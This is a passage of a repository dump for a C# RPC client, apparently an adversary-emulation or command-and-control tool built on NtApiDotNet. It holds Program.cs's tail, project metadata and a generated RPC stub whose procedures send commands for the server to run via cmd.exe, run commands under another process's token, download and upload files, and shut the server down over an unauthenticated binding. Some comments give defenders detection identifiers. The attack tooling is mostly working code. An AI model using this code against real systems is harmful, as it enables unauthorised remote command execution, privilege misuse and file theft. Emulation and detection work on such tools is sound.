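                        // The payload comes from the remote endpoint; FromBase64String throws on a null
                        // or malformed value and the catch below reports it instead of writing a file.
                        File.WriteAllBytes(localpath, Convert.FromBase64String(encoded));
                        break;
                    }
                    case "upload":
                    {
                        byte[] file = File.ReadAllBytes(localpath);
                        string encodedFile = Convert.ToBase64String(file);
                        Console.WriteLine("[+] Sending Upload command: {0}", remotepath);
                        client.Upload(remotepath, encodedFile);
                        Console.WriteLine("[+] Upload complete: {0} bytes sent", file.Length);
                        break;
                    }
                    case "shutdown":
                        client.Shutdown();
                        break;
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("Runtime error: {0}", e.Message);
            }
            finally
            {
                client.Disconnect();
            }
        }
    }
}
--------------------------------------------------------------------------------
/RpcSharpClient/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes.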
Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("RpcSharpClient")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("RpcSharpClient")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("0abb9f2a-6913-4174-9431-851f9d3e94b4")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /RpcSharpClient/RpcSharpClient.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | Debug 8 | AnyCPU 9 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4} 10 | Exe 11 | RpcSharpClient 12 | RpcSharpClient 13 | v4.7.2 14 | 512 15 | true 16 | true 17 | publish\ 18 | true 19 | Disk 20 | false 21 | Foreground 22 | 7 23 | Days 24 | false 25 | false 26 | true 27 | 0 28 | 1.0.0.%2a 29 | false 30 | false 31 | true 32 | 33 | 34 | 35 | 36 | AnyCPU 37 | true 38 | full 39 | false 40 | ..\ 41 | DEBUG;TRACE 42 | prompt 43 | 4 44 | 45 | 46 | 47 | 48 | 
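// File: RpcSharpClient/fa161e81-6e93-4f41-961c-ee9c2e75de17_1.0.cs
//
// Client-side stub for RPC interface fa161e81-6e93-4f41-961c-ee9c2e75de17, version 1.0,
// built on NtApiDotNet (the project file on this page references NtApiDotNet 1.1.33).
// The layout looks like output of NtApiDotNet's RPC client generator -- TODO confirm.
//
// Notes for defenders reading this stub:
//  * The interface UUID and the procedure numbers 0-4 are fixed in this file, so they
//    are stable identifiers for this emulation build in any RPC telemetry that records
//    interface UUID and procedure number (for example the Microsoft-Windows-RPC ETW
//    provider). The UUID is also a candidate condition for an RPC filter.
//  * Program.cs on this page binds with RpcAuthenticationLevel.None, so calls made
//    through this stub carry no RPC-level authentication.
//  * The README gives the server endpoints as TCP port 4747 and a hard-coded pipe name.
//  * All strings are marshalled with the ANSI string helpers; presumably characters
//    outside the ANSI code page do not round-trip -- verify before relying on it.
namespace rpc_fa161e81_6e93_4f41_961c_ee9c2e75de17_1_0
{

    #region Marshal Helpers
    /// <summary>Request-side NDR buffer; adds nothing to the NtApiDotNet base class.</summary>
    internal class _Marshal_Helper : NtApiDotNet.Ndr.Marshal.NdrMarshalBuffer
    {
    }

    /// <summary>Response-side NDR buffer; only forwards its constructor arguments to the base class.</summary>
    internal class _Unmarshal_Helper : NtApiDotNet.Ndr.Marshal.NdrUnmarshalBuffer
    {
        /// <summary>Wraps the NDR buffer, handles and data representation of an RPC response.</summary>
        public _Unmarshal_Helper(NtApiDotNet.Win32.Rpc.RpcClientResponse r) :
                base(r.NdrBuffer, r.Handles, r.DataRepresentation)
        {
        }

        /// <summary>Wraps a raw byte array as an unmarshal buffer.</summary>
        public _Unmarshal_Helper(byte[] ba) :
                base(ba)
        {
        }
    }
    #endregion

    #region Client Implementation
    /// <summary>
    /// RPC client for interface fa161e81-6e93-4f41-961c-ee9c2e75de17 v1.0. Each public
    /// method marshals its arguments, issues one call with a fixed procedure number and
    /// unmarshals the reply. Connecting and disconnecting are inherited from
    /// <c>RpcClientBase</c> and are driven by Program.cs.
    /// </summary>
    public sealed class Client : NtApiDotNet.Win32.Rpc.RpcClientBase
    {
        /// <summary>Binds the stub to the interface UUID and version (major 1, minor 0).</summary>
        public Client() :
                base("fa161e81-6e93-4f41-961c-ee9c2e75de17", 1, 0)
        {
        }

        /// <summary>
        /// Sends the marshalled request for procedure <paramref name="p"/> through the
        /// base-class transport and wraps the response for unmarshalling.
        /// </summary>
        /// <param name="p">Procedure number of the call.</param>
        /// <param name="m">Marshal buffer holding the request arguments.</param>
        /// <returns>An unmarshal buffer over the server's response.</returns>
        private _Unmarshal_Helper SendReceive(int p, _Marshal_Helper m)
        {
            return new _Unmarshal_Helper(SendReceive(p, m.DataRepresentation, m.ToArray(), m.Handles));
        }

        /// <summary>
        /// Procedure 0. Sends a command string and returns the text the server sends back.
        /// Per the README the server runs the command with <c>cmd.exe /c</c>.
        /// </summary>
        /// <param name="p0">Command string (Program.cs passes the <c>--command</c> value).</param>
        /// <param name="p1">Receives the string returned by the server.</param>
        public void Execute(string p0, out string p1)
        {
            _Marshal_Helper m = new _Marshal_Helper();
            m.WriteReferent(p0, new System.Action<string>(m.WriteTerminatedAnsiString));
            _Unmarshal_Helper u = SendReceive(0, m);
            p1 = u.ReadReferent<string>(new System.Func<string>(u.ReadConformantVaryingAnsiString), false);
        }

        /// <summary>
        /// Procedure 1. Same request as <see cref="Execute"/> plus a 32-bit integer;
        /// Program.cs passes the parsed <c>--pid</c> value, which the README describes as
        /// the process whose token the server uses to run the command.
        /// </summary>
        /// <param name="p0">Command string.</param>
        /// <param name="p1">Process id, written as an Int32.</param>
        /// <param name="p2">Receives the string returned by the server.</param>
        public void ExecuteWithToken(string p0, int p1, out string p2)
        {
            _Marshal_Helper m = new _Marshal_Helper();
            m.WriteReferent(p0, new System.Action<string>(m.WriteTerminatedAnsiString));
            m.WriteInt32(p1);
            _Unmarshal_Helper u = SendReceive(1, m);
            p2 = u.ReadReferent<string>(new System.Func<string>(u.ReadConformantVaryingAnsiString), false);
        }

        /// <summary>
        /// Procedure 2. Sends a path and returns a string; Program.cs treats the returned
        /// string as Base64 file content and decodes it before writing the local file.
        /// </summary>
        /// <param name="p0">Path on the server side (the <c>--remotepath</c> value).</param>
        /// <param name="p1">Receives the string returned by the server.</param>
        public void Download(string p0, out string p1)
        {
            _Marshal_Helper m = new _Marshal_Helper();
            m.WriteReferent(p0, new System.Action<string>(m.WriteTerminatedAnsiString));
            _Unmarshal_Helper u = SendReceive(2, m);
            p1 = u.ReadReferent<string>(new System.Func<string>(u.ReadConformantVaryingAnsiString), false);
        }

        /// <summary>
        /// Procedure 3. Sends a path and a second string; Program.cs passes the Base64
        /// encoding of the local file as the second string. Nothing is read from the reply.
        /// </summary>
        /// <param name="p0">Path on the server side (the <c>--remotepath</c> value).</param>
        /// <param name="p1">File content as a Base64 string.</param>
        public void Upload(string p0, string p1)
        {
            _Marshal_Helper m = new _Marshal_Helper();
            m.WriteReferent(p0, new System.Action<string>(m.WriteTerminatedAnsiString));
            m.WriteReferent(p1, new System.Action<string>(m.WriteTerminatedAnsiString));
            // The reply carries no out parameters for this procedure, so it is not kept.
            SendReceive(3, m);
        }

        /// <summary>
        /// Procedure 4. Sends an empty request; the README lists this as the call that
        /// terminates the RPC server. Nothing is read from the reply.
        /// </summary>
        public void Shutdown()
        {
            _Marshal_Helper m = new _Marshal_Helper();
            SendReceive(4, m);
        }
    }
    #endregion
}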